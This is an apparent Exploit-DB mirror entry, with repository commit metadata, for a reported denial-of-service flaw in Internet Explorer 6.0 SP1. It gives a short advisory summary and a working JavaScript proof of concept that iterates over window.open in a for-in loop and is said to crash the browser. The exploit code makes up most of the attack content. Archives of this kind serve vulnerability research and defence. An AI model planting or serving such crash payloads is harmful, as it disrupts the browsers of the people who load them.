exploit-db-mirror/exploits/windows/dos/24267.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
650 B
Text

source: https://www.securityfocus.com/bid/10694/info
A denial of service vulnerability is reported to affect Internet Explorer. The issue is reported to present itself when Internet Explorer attempts to render JavaScript that contains an invalid for statement.
A remote attacker may exploit this vulnerability to cause the running instance of Internet Explorer to crash.
This vulnerability is reported to affect Internet Explorer version 6.0 (SP1), other versions might also be affected.
<SCRIPT language="javascript">
MSIE = window.open; // for hackers to come in
for (every_bug_found in MSIE) { /* there are zillions more hiden */ }
</SCRIPT>